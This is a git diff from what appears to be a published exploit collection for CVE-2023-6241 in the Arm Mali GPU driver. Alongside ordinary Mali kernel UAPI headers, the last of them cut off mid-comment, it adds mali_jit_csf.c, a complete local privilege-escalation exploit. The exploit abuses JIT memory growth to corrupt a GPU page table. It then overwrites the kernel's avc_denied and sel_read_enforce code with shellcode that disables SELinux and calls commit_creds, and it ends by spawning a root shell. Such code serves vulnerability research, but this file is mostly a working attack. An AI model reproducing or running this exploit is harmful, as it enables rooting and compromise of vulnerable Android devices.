+ */ + +#ifndef _UAPI_BASE_KERNEL_H_ +#define _UAPI_BASE_KERNEL_H_ + +#include + +#define BASE_MAX_COHERENT_GROUPS 16 + +/* Physical memory group ID for normal usage. + */ +#define BASE_MEM_GROUP_DEFAULT (0) + +/* Physical memory group ID for explicit SLC allocations. + */ +#define BASE_MEM_GROUP_PIXEL_SLC_EXPLICIT (2) + +/* Number of physical memory groups. + */ +#define BASE_MEM_GROUP_COUNT (16) + +/** + * typedef base_mem_alloc_flags - Memory allocation, access/hint flags. + * + * A combination of MEM_PROT/MEM_HINT flags must be passed to each allocator + * in order to determine the best cache policy. Some combinations are + * of course invalid (e.g. MEM_PROT_CPU_WR | MEM_HINT_CPU_RD), + * which defines a write-only region on the CPU side, which is + * heavily read by the CPU... + * Other flags are only meaningful to a particular allocator. + * More flags can be added to this list, as long as they don't clash + * (see BASE_MEM_FLAGS_NR_BITS for the number of the first free bit). + */ +typedef __u32 base_mem_alloc_flags; + + +struct base_mem_handle { + struct { + __u64 handle; + } basep; +}; + +/** + * enum base_mem_import_type - Memory types supported by @a base_mem_import + * + * @BASE_MEM_IMPORT_TYPE_INVALID: Invalid type + * @BASE_MEM_IMPORT_TYPE_UMM: UMM import. Handle type is a file descriptor (int) + * @BASE_MEM_IMPORT_TYPE_USER_BUFFER: User buffer import. Handle is a + * base_mem_import_user_buffer + * + * Each type defines what the supported handle type is. + * + * If any new type is added here ARM must be contacted + * to allocate a numeric value for it. + * Do not just add a new type without synchronizing with ARM + * as future releases from ARM might include other new types + * which could clash with your custom types. + */ +enum base_mem_import_type { + BASE_MEM_IMPORT_TYPE_INVALID = 0, + /* + * Import type with value 1 is deprecated. + */ + BASE_MEM_IMPORT_TYPE_UMM = 2, + BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3 +}; + +/** + * struct base_mem_import_user_buffer - Handle of an imported user buffer + * + * @ptr: address of imported user buffer + * @length: length of imported user buffer in bytes + * + * This structure is used to represent a handle of an imported user buffer. + */ + +struct base_mem_import_user_buffer { + __u64 ptr; + __u64 length; +}; + +/* + * struct base_fence - Cross-device synchronisation fence. + * + * A fence is used to signal when the GPU has finished accessing a resource that + * may be shared with other devices, and also to delay work done asynchronously + * by the GPU until other devices have finished accessing a shared resource. + */ +struct base_fence { + struct { + int fd; + int stream_fd; + } basep; +}; + +/** + * struct base_mem_aliasing_info - Memory aliasing info + * + * @handle: Handle to alias, can be BASE_MEM_WRITE_ALLOC_PAGES_HANDLE + * @offset: Offset within the handle to start aliasing from, in pages. + * Not used with BASE_MEM_WRITE_ALLOC_PAGES_HANDLE. + * @length: Length to alias, in pages. For BASE_MEM_WRITE_ALLOC_PAGES_HANDLE + * specifies the number of times the special page is needed. + * + * Describes a memory handle to be aliased. + * A subset of the handle can be chosen for aliasing, given an offset and a + * length. + * A special handle BASE_MEM_WRITE_ALLOC_PAGES_HANDLE is used to represent a + * region where a special page is mapped with a write-alloc cache setup, + * typically used when the write result of the GPU isn't needed, but the GPU + * must write anyway. + * + * Offset and length are specified in pages. + * Offset must be within the size of the handle. + * Offset+length must not overrun the size of the handle. + */ +struct base_mem_aliasing_info { + struct base_mem_handle handle; + __u64 offset; + __u64 length; +}; + +/* Maximum percentage of just-in-time memory allocation trimming to perform + * on free. + */ +#define BASE_JIT_MAX_TRIM_LEVEL (100) + +/* Maximum number of concurrent just-in-time memory allocations. + */ +#define BASE_JIT_ALLOC_COUNT (255) + +/* base_jit_alloc_info in use for kernel driver versions 10.2 to early 11.5 + * + * jit_version is 1 + * + * Due to the lack of padding specified, user clients between 32 and 64-bit + * may have assumed a different size of the struct + * + * An array of structures was not supported + */ +struct base_jit_alloc_info_10_2 { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; +}; + +/* base_jit_alloc_info introduced by kernel driver version 11.5, and in use up + * to 11.19 + * + * This structure had a number of modifications during and after kernel driver + * version 11.5, but remains size-compatible throughout its version history, and + * with earlier variants compatible with future variants by requiring + * zero-initialization to the unused space in the structure. + * + * jit_version is 2 + * + * Kernel driver version history: + * 11.5: Initial introduction with 'usage_id' and padding[5]. All padding bytes + * must be zero. Kbase minor version was not incremented, so some + * versions of 11.5 do not have this change. + * 11.5: Added 'bin_id' and 'max_allocations', replacing 2 padding bytes (Kbase + * minor version not incremented) + * 11.6: Added 'flags', replacing 1 padding byte + * 11.10: Arrays of this structure are supported + */ +struct base_jit_alloc_info_11_5 { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; +}; + +/** + * struct base_jit_alloc_info - Structure which describes a JIT allocation + * request. + * @gpu_alloc_addr: The GPU virtual address to write the JIT + * allocated GPU virtual address to. + * @va_pages: The minimum number of virtual pages required. + * @commit_pages: The minimum number of physical pages which + * should back the allocation. + * @extension: Granularity of physical pages to grow the + * allocation by during a fault. + * @id: Unique ID provided by the caller, this is used + * to pair allocation and free requests. + * Zero is not a valid value. + * @bin_id: The JIT allocation bin, used in conjunction with + * @max_allocations to limit the number of each + * type of JIT allocation. + * @max_allocations: The maximum number of allocations allowed within + * the bin specified by @bin_id. Should be the same + * for all allocations within the same bin. + * @flags: flags specifying the special requirements for + * the JIT allocation, see + * %BASE_JIT_ALLOC_VALID_FLAGS + * @padding: Expansion space - should be initialised to zero + * @usage_id: A hint about which allocation should be reused. + * The kernel should attempt to use a previous + * allocation with the same usage_id + * @heap_info_gpu_addr: Pointer to an object in GPU memory describing + * the actual usage of the region. + * + * jit_version is 3. + * + * When modifications are made to this structure, it is still compatible with + * jit_version 3 when: a) the size is unchanged, and b) new members only + * replace the padding bytes. + * + * Previous jit_version history: + * jit_version == 1, refer to &base_jit_alloc_info_10_2 + * jit_version == 2, refer to &base_jit_alloc_info_11_5 + * + * Kbase version history: + * 11.20: added @heap_info_gpu_addr + */ +struct base_jit_alloc_info { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; + __u64 heap_info_gpu_addr; +}; + +enum base_external_resource_access { + BASE_EXT_RES_ACCESS_SHARED, + BASE_EXT_RES_ACCESS_EXCLUSIVE +}; + +struct base_external_resource { + __u64 ext_resource; +}; + +/** + * BASE_EXT_RES_COUNT_MAX - The maximum number of external resources + * which can be mapped/unmapped in a single request. + */ +#define BASE_EXT_RES_COUNT_MAX 10 + +/** + * struct base_external_resource_list - Structure which describes a list of + * external resources. + * @count: The number of resources. + * @ext_res: Array of external resources which is + * sized at allocation time. + */ +struct base_external_resource_list { + __u64 count; + struct base_external_resource ext_res[1]; +}; + +#endif /* _UAPI_BASE_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_jit_csf.c b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_jit_csf.c new file mode 100644 index 0000000..724d031 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_jit_csf.c @@ -0,0 +1,435 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include +#include + +//From https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17 +#include "CL/cl.h" +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" +#include "mem_read_write.h" +#include "mempool_utils.h" +#include "firmware_offsets.h" + +#define MALI "/dev/mali0" + +//#define GROW_SIZE 0x2000 + +#define GROW_SIZE (0x2000 - 10) + +#define FREED_NUM 1 + +#define JIT_SIZE 0x23d0 + +#define FAULT_SIZE 0x300 + +#define PTE_PAGES 0x200 + +#define PTE_SIZE (PTE_PAGES << 12) + +#define TEST_VAL 0x42424242 + +#define THRESHOLD 0x2300 + +#define REUSE_REG_SIZE 0x100 + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; + +uint64_t reused_regions[REUSE_REG_SIZE] = {0}; + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2311; + +static uint64_t avc_deny = AVC_DENY_2311; + +/* +Overwriting SELinux to permissive + strb wzr, [x0] + mov x0, #0 + ret +*/ +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static int open_dev(char* name) { + int fd = open(name, O_RDWR); + if (fd == -1) { + err(1, "cannot open %s\n", name); + } + return fd; +} + +int find_mali_fd() { + int test_fd = open("/dev/null", O_RDWR); + char file_path[256]; + char proc_string[256]; + for (int i = 3; i < test_fd; i++) { + sprintf(proc_string, "/proc/self/fd/%d", i); + if(readlink(proc_string, file_path, 256) > 0) { + if (strcmp(file_path, MALI) == 0) { + close(test_fd); + return i; + } + } + } + close(test_fd); + return -1; +} + +void setup_mali(int fd, int group_id) { + + struct kbase_ioctl_version_check param = {0}; + if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { + LOG("major %d\n", param.major); + err(1, "version check failed\n"); + } + + struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { + err(1, "set flags failed\n"); + } +} + +void* setup_tracking_page(int fd) { + void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE); + if (region == MAP_FAILED) { + err(1, "setup tracking page failed"); + } + return region; +} + +void mem_query(int fd, union kbase_ioctl_mem_query* query) { + if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) { + err(1, "mem_query failed\n"); + } +} + +void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) { + struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, pages = pages}; + if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) { + LOG("commit failed\n"); + } +} + +uint64_t get_mem_size(int fd, uint64_t gpu_addr) { + union kbase_ioctl_mem_query query = {0}; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + query.in.gpu_addr = gpu_addr; + mem_query(fd, &query); + return query.out.value; +} + +void queue_register(int fd, uint64_t queue_addr, uint32_t queue_pages) { + struct kbase_ioctl_cs_queue_register reg = {0}; + reg.buffer_gpu_addr = queue_addr; + reg.buffer_size = queue_pages; + if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_REGISTER, ®) < 0) { + err(1, "register queue failed\n"); + } +} + +uint64_t queue_bind(int fd, uint64_t queue_addr, uint8_t group_handle, uint8_t csi_index) { + union kbase_ioctl_cs_queue_bind bind = {0}; + bind.in.buffer_gpu_addr = queue_addr; + bind.in.group_handle = group_handle; + bind.in.csi_index = csi_index; + if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_BIND, &bind) < 0) { + err(1, "bind queue failed\n"); + } + return bind.out.mmap_handle; +} + +uint8_t kcpu_queue_new(int fd) { + struct kbase_ioctl_kcpu_queue_new queue_new = {0}; + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_CREATE, &queue_new) < 0) { + err(1, "kcpu queue create failed\n"); + } + return queue_new.id; +} + +void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { + struct kbase_ioctl_mem_jit_init init = {0}; + init.va_pages = va_pages; + init.max_allocations = 255; + init.trim_level = trim_level; + init.group_id = group_id; + init.phys_pages = va_pages; + + if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) { + err(1, "jit init failed\n"); + } +} + +uint64_t jit_allocate(int fd, uint8_t queue_id, uint8_t jit_id, uint64_t va_pages, uint64_t commit_pages, uint8_t bin_id, uint16_t usage_id, uint64_t gpu_alloc_addr) { + *((uint64_t*)gpu_alloc_addr) = 0; + struct base_jit_alloc_info info = {0}; + info.id = jit_id; + info.gpu_alloc_addr = gpu_alloc_addr; + info.va_pages = va_pages; + info.commit_pages = commit_pages; + info.extension = 1; + info.bin_id = bin_id; + info.usage_id = usage_id; + + struct base_kcpu_command_jit_alloc_info jit_alloc_info = {0}; + jit_alloc_info.info = (uint64_t)(&info); + jit_alloc_info.count = 1; + struct base_kcpu_command cmd = {0}; + cmd.info.jit_alloc = jit_alloc_info; + cmd.type = BASE_KCPU_COMMAND_TYPE_JIT_ALLOC; + struct kbase_ioctl_kcpu_queue_enqueue enq = {0}; + enq.id = queue_id; + enq.nr_commands = 1; + enq.addr = (uint64_t)(&cmd); + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_ENQUEUE, &enq) < 0) { + err(1, "jit allocate failed\n"); + } + volatile uint64_t ret = *((uint64_t*)gpu_alloc_addr); + while (ret == 0) { + ret = *((uint64_t*)gpu_alloc_addr); + } + return ret; +} + +void jit_free(int fd, uint8_t queue_id, uint8_t jit_id) { + uint8_t free_id = jit_id; + struct base_kcpu_command_jit_free_info info = {0}; + info.ids = (uint64_t)(&free_id); + info.count = 1; + struct base_kcpu_command cmd = {0}; + cmd.info.jit_free = info; + cmd.type = BASE_KCPU_COMMAND_TYPE_JIT_FREE; + struct kbase_ioctl_kcpu_queue_enqueue enq = {0}; + enq.id = queue_id; + enq.nr_commands = 1; + enq.addr = (uint64_t)(&cmd); + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_ENQUEUE, &enq) < 0) { + err(1, "jit free failed\n"); + } +} + +void* jit_grow(void* args) { + uint64_t* arguments = (uint64_t*)args; + int mali_fd = arguments[0]; + int qid = arguments[1]; + int jit_id = arguments[2]; + uint64_t gpu_alloc_addr = arguments[3]; + uint64_t addr = jit_allocate(mali_fd, qid, jit_id, JIT_SIZE, GROW_SIZE, 1, 1, gpu_alloc_addr); + LOG("jit_grow addr %lx\n", addr); + return NULL; +} + +void create_reuse_regions(int mali_fd, uint64_t* reuse_regions, size_t size) { + for (int i = 0; i < size; i++) { + reuse_regions[i] = (uint64_t)map_gpu(mali_fd, 1, 1, false, 0); + memset((void*)(reused_regions[i]), 0, 0x1000); + } +} + +uint64_t find_reused_page(uint64_t* reuse_regions, size_t size) { + for (int i = 0; i < size; i++) { + uint64_t* region_start = (uint64_t*)(reused_regions[i]); + for (int j = 0; j < 0x1000/sizeof(uint64_t); j++) { + if (region_start[j] == TEST_VAL) { + LOG("found reused page %lx, %d\n", (uint64_t)region_start, j); + return (uint64_t)region_start; + } + } + } + return -1; +} + +int find_pgd(int mali_fd, uint64_t gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel, uint64_t* out) { + int ret = -1; + uint64_t read_addr = gpu_addr; + for (int i = 0; i < 0x1000/8; i++) { + uint64_t entry = read_from(mali_fd, &read_addr, command_queue, kernel); + read_addr += 8; + if ((entry & 0x443) == 0x443) { + *out = entry; + return i; + } + } + return ret; +} + +void write_shellcode(int mali_fd, uint64_t pgd, uint64_t* reserved, cl_command_queue command_queue, struct rw_mem_kernel* kernel, struct rw_mem_kernel* kernel32) { + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + uint64_t overwrite_index = pgd + OVERWRITE_INDEX * sizeof(uint64_t); + write_to(mali_fd, &overwrite_index, &avc_deny_addr, command_queue, kernel); + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + write_func(mali_fd, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t), RESERVED_SIZE, command_queue, kernel32); + + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, &overwrite_index, &sel_read_enforce_addr, command_queue, kernel); + + //Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t), RESERVED_SIZE, command_queue, kernel32); +} + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + fixup_root_shell(INIT_CRED_2311, COMMIT_CREDS_2311, SEL_READ_ENFORCE_2311, ADD_INIT_2311, ADD_COMMIT_2311, &(root_code[0])); + cl_platform_id platform_id = NULL; + cl_device_id device_id = NULL; + cl_uint ret_num_devices; + cl_uint ret_num_platforms; + + cl_int ret = clGetPlatformIDs(1, &platform_id, &ret_num_platforms); + if (ret != CL_SUCCESS) { + err(1, "fail to get platform\n"); + } + int mali_fd = find_mali_fd(); + LOG("mali_fd %d\n", mali_fd); + + uint8_t qid = kcpu_queue_new(mali_fd); + void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0); + memset(gpu_alloc_addr, 0, 0x1000); + + uint64_t test_jit_id = 1; + uint64_t test_jit_addr = jit_allocate(mali_fd, qid, test_jit_id, 1, 0, 0, 0, (uint64_t)gpu_alloc_addr); + uint64_t remainder = test_jit_addr % PTE_SIZE; + if (remainder) { + test_jit_id++; + jit_allocate(mali_fd, qid, test_jit_id, (PTE_PAGES + 1 - (remainder >> 12)), 0, 0, 0, (uint64_t)gpu_alloc_addr); + } + + uint64_t corrupted_jit_id = test_jit_id + 1; + uint64_t second_jit_id = corrupted_jit_id + 1; + + uint64_t corrupted_jit_addr = jit_allocate(mali_fd, qid, corrupted_jit_id, JIT_SIZE, 1, 1, 1, (uint64_t)gpu_alloc_addr); + + LOG("corrupted_jit_addr %lx\n", corrupted_jit_addr); + + jit_free(mali_fd, qid, corrupted_jit_id); + + ret = clGetDeviceIDs( platform_id, CL_DEVICE_TYPE_DEFAULT, 1, + &device_id, &ret_num_devices); + if (ret != CL_SUCCESS) { + err(1, "fail to get Device ID\n"); + } + + cl_context context = clCreateContext( NULL, 1, &device_id, NULL, NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "fail to create context\n"); + } + + cl_command_queue command_queue = clCreateCommandQueueWithProperties(context, device_id, NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "fail to create command_queue\n"); + } + + + uint64_t write_addr = corrupted_jit_addr + FAULT_SIZE * 0x1000; + uint64_t value = 32; + uint64_t write = 1; + + struct rw_mem_kernel kernel = create_rw_mem(context, &device_id, true); + struct rw_mem_kernel kernel32 = create_rw_mem(context, &device_id, false); + + ret = clEnqueueWriteBuffer(command_queue, kernel.va, CL_TRUE, 0, sizeof(uint64_t), &write_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel.in_out, CL_TRUE, 0, sizeof(uint64_t), &value, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel.flag, CL_TRUE, 0, sizeof(uint64_t), &write, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + LOG("queue kernel\n"); + pthread_t thread; + uint64_t args[4]; + args[0] = mali_fd; + args[1] = qid; + args[2] = corrupted_jit_id; + args[3] = (uint64_t)gpu_alloc_addr; + + pthread_create(&thread, NULL, &jit_grow, (void*)&(args[0])); + ret = clEnqueueNDRangeKernel(command_queue, kernel.kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + usleep(10000); + ret = clFlush(command_queue); + + pthread_join(thread, NULL); + uint64_t region_size = get_mem_size(mali_fd, corrupted_jit_addr); + LOG("Size after grow: %lx\n", region_size); + + write_addr = corrupted_jit_addr + (FAULT_SIZE + GROW_SIZE + 0xd0) * 0x1000; + write_to(mali_fd, &write_addr, &value, command_queue, &kernel); + + uint64_t final_grow_size = get_mem_size(mali_fd, corrupted_jit_addr); + LOG("Final grow size: %lx\n", final_grow_size); + + uint64_t keep_alive_jit_addr = jit_allocate(mali_fd, qid, second_jit_id + 1, 10, 10, 0, 0, (uint64_t)gpu_alloc_addr); + LOG("keep alive jit_addr %lx\n", keep_alive_jit_addr); + + jit_free(mali_fd, qid, corrupted_jit_id); + usleep(10000); + uint64_t trimmed_size = get_mem_size(mali_fd, corrupted_jit_addr); + LOG("Size after free: %lx, trim_level %lu\n", trimmed_size, 100 - (trimmed_size * 100)/final_grow_size); + + uint64_t reclaim_addr = jit_allocate(mali_fd, qid, corrupted_jit_id, JIT_SIZE, trimmed_size, 1, 1, (uint64_t)gpu_alloc_addr); + if (reclaim_addr != corrupted_jit_addr) { + err(1, "Inconsistent address when reclaiming freed jit region %lx %lx\n", reclaim_addr, corrupted_jit_addr); + } + + create_reuse_regions(mali_fd, &(reused_regions[0]), REUSE_REG_SIZE); + + value = TEST_VAL; + write_addr = corrupted_jit_addr + (THRESHOLD) * 0x1000; + LOG("writing to gpu_va %lx\n", write_addr); + write_to(mali_fd, &write_addr, &value, command_queue, &kernel); + + uint64_t reused_addr = find_reused_page(&(reused_regions[0]), REUSE_REG_SIZE); + if (reused_addr == -1) { + err(1, "Cannot find reused page\n"); + } + reserve_pages(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + uint64_t drain = drain_mem_pool(mali_fd); + release_mem_pool(mali_fd, drain); + + mem_commit(mali_fd, reused_addr, 0); + map_reserved(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + + uint64_t entry = 0; + int res = find_pgd(mali_fd, write_addr, command_queue, &kernel, &entry); + if (res == -1) { + err(1, "Cannot find page table entry\n"); + } + LOG("pgd entry found at index %d %lx\n", res, entry); + + write_shellcode(mali_fd, write_addr, &(reserved[0]), command_queue, &kernel, &kernel32); + run_enforce(); + cleanup(mali_fd, write_addr, command_queue, &kernel); + + ret = clFinish(command_queue); + releaseKernel(&kernel); + releaseKernel(&kernel32); + ret = clReleaseCommandQueue(command_queue); + ret = clReleaseContext(context); + system("sh"); + } diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_csf_ioctl.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_csf_ioctl.h new file mode 100644 index 0000000..91249ca --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_csf_ioctl.h @@ -0,0 +1,556 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_KBASE_CSF_IOCTL_H_ +#define _UAPI_KBASE_CSF_IOCTL_H_ + +#include +#include + +/* + * 1.0: + * - CSF IOCTL header separated from JM + * 1.1: + * - Add a new priority level BASE_QUEUE_GROUP_PRIORITY_REALTIME + * - Add ioctl 54: This controls the priority setting. + * 1.2: + * - Add new CSF GPU_FEATURES register into the property structure + * returned by KBASE_IOCTL_GET_GPUPROPS + * 1.3: + * - Add __u32 group_uid member to + * &struct_kbase_ioctl_cs_queue_group_create.out + * 1.4: + * - Replace padding in kbase_ioctl_cs_get_glb_iface with + * instr_features member of same size + * 1.5: + * - Add ioctl 40: kbase_ioctl_cs_queue_register_ex, this is a new + * queue registration call with extended format for supporting CS + * trace configurations with CSF trace_command. + * 1.6: + * - Added new HW performance counters interface to all GPUs. + * 1.7: + * - Added reserved field to QUEUE_GROUP_CREATE ioctl for future use + * 1.8: + * - Removed Kernel legacy HWC interface + * 1.9: + * - Reorganization of GPU-VA memory zones, including addition of + * FIXED_VA zone and auto-initialization of EXEC_VA zone. + * - Added new Base memory allocation interface + * 1.10: + * - First release of new HW performance counters interface. + * 1.11: + * - Dummy model (no mali) backend will now clear HWC values after each sample + * 1.12: + * - Added support for incremental rendering flag in CSG create call + * 1.13: + * - Added ioctl to query a register of USER page. + * 1.14: + * - Added support for passing down the buffer descriptor VA in tiler heap init + */ + +#define BASE_UK_VERSION_MAJOR 1 +#define BASE_UK_VERSION_MINOR 14 + +/** + * struct kbase_ioctl_version_check - Check version compatibility between + * kernel and userspace + * + * @major: Major version number + * @minor: Minor version number + */ +struct kbase_ioctl_version_check { + __u16 major; + __u16 minor; +}; + +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \ + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check) + +/** + * struct kbase_ioctl_cs_queue_register - Register a GPU command queue with the + * base back-end + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + * @buffer_size: Size of the buffer in bytes + * @priority: Priority of the queue within a group when run within a process + * @padding: Currently unused, must be zero + * + * Note: There is an identical sub-section in kbase_ioctl_cs_queue_register_ex. + * Any change of this struct should also be mirrored to the latter. + */ +struct kbase_ioctl_cs_queue_register { + __u64 buffer_gpu_addr; + __u32 buffer_size; + __u8 priority; + __u8 padding[3]; +}; + +#define KBASE_IOCTL_CS_QUEUE_REGISTER \ + _IOW(KBASE_IOCTL_TYPE, 36, struct kbase_ioctl_cs_queue_register) + +/** + * struct kbase_ioctl_cs_queue_kick - Kick the GPU command queue group scheduler + * to notify that a queue has been updated + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + */ +struct kbase_ioctl_cs_queue_kick { + __u64 buffer_gpu_addr; +}; + +#define KBASE_IOCTL_CS_QUEUE_KICK \ + _IOW(KBASE_IOCTL_TYPE, 37, struct kbase_ioctl_cs_queue_kick) + +/** + * union kbase_ioctl_cs_queue_bind - Bind a GPU command queue to a group + * + * @in: Input parameters + * @in.buffer_gpu_addr: GPU address of the buffer backing the queue + * @in.group_handle: Handle of the group to which the queue should be bound + * @in.csi_index: Index of the CSF interface the queue should be bound to + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.mmap_handle: Handle to be used for creating the mapping of CS + * input/output pages + */ +union kbase_ioctl_cs_queue_bind { + struct { + __u64 buffer_gpu_addr; + __u8 group_handle; + __u8 csi_index; + __u8 padding[6]; + } in; + struct { + __u64 mmap_handle; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_BIND \ + _IOWR(KBASE_IOCTL_TYPE, 39, union kbase_ioctl_cs_queue_bind) + +/** + * struct kbase_ioctl_cs_queue_register_ex - Register a GPU command queue with the + * base back-end in extended format, + * involving trace buffer configuration + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + * @buffer_size: Size of the buffer in bytes + * @priority: Priority of the queue within a group when run within a process + * @padding: Currently unused, must be zero + * @ex_offset_var_addr: GPU address of the trace buffer write offset variable + * @ex_buffer_base: Trace buffer GPU base address for the queue + * @ex_buffer_size: Size of the trace buffer in bytes + * @ex_event_size: Trace event write size, in log2 designation + * @ex_event_state: Trace event states configuration + * @ex_padding: Currently unused, must be zero + * + * Note: There is an identical sub-section at the start of this struct to that + * of @ref kbase_ioctl_cs_queue_register. Any change of this sub-section + * must also be mirrored to the latter. Following the said sub-section, + * the remaining fields forms the extension, marked with ex_*. + */ +struct kbase_ioctl_cs_queue_register_ex { + __u64 buffer_gpu_addr; + __u32 buffer_size; + __u8 priority; + __u8 padding[3]; + __u64 ex_offset_var_addr; + __u64 ex_buffer_base; + __u32 ex_buffer_size; + __u8 ex_event_size; + __u8 ex_event_state; + __u8 ex_padding[2]; +}; + +#define KBASE_IOCTL_CS_QUEUE_REGISTER_EX \ + _IOW(KBASE_IOCTL_TYPE, 40, struct kbase_ioctl_cs_queue_register_ex) + +/** + * struct kbase_ioctl_cs_queue_terminate - Terminate a GPU command queue + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + */ +struct kbase_ioctl_cs_queue_terminate { + __u64 buffer_gpu_addr; +}; + +#define KBASE_IOCTL_CS_QUEUE_TERMINATE \ + _IOW(KBASE_IOCTL_TYPE, 41, struct kbase_ioctl_cs_queue_terminate) + +/** + * union kbase_ioctl_cs_queue_group_create_1_6 - Create a GPU command queue + * group + * @in: Input parameters + * @in.tiler_mask: Mask of tiler endpoints the group is allowed to use. + * @in.fragment_mask: Mask of fragment endpoints the group is allowed to use. + * @in.compute_mask: Mask of compute endpoints the group is allowed to use. + * @in.cs_min: Minimum number of CSs required. + * @in.priority: Queue group's priority within a process. + * @in.tiler_max: Maximum number of tiler endpoints the group is allowed + * to use. + * @in.fragment_max: Maximum number of fragment endpoints the group is + * allowed to use. + * @in.compute_max: Maximum number of compute endpoints the group is allowed + * to use. + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.group_handle: Handle of a newly created queue group. + * @out.padding: Currently unused, must be zero + * @out.group_uid: UID of the queue group available to base. + */ +union kbase_ioctl_cs_queue_group_create_1_6 { + struct { + __u64 tiler_mask; + __u64 fragment_mask; + __u64 compute_mask; + __u8 cs_min; + __u8 priority; + __u8 tiler_max; + __u8 fragment_max; + __u8 compute_max; + __u8 padding[3]; + + } in; + struct { + __u8 group_handle; + __u8 padding[3]; + __u32 group_uid; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE_1_6 \ + _IOWR(KBASE_IOCTL_TYPE, 42, union kbase_ioctl_cs_queue_group_create_1_6) + +/** + * union kbase_ioctl_cs_queue_group_create - Create a GPU command queue group + * @in: Input parameters + * @in.tiler_mask: Mask of tiler endpoints the group is allowed to use. + * @in.fragment_mask: Mask of fragment endpoints the group is allowed 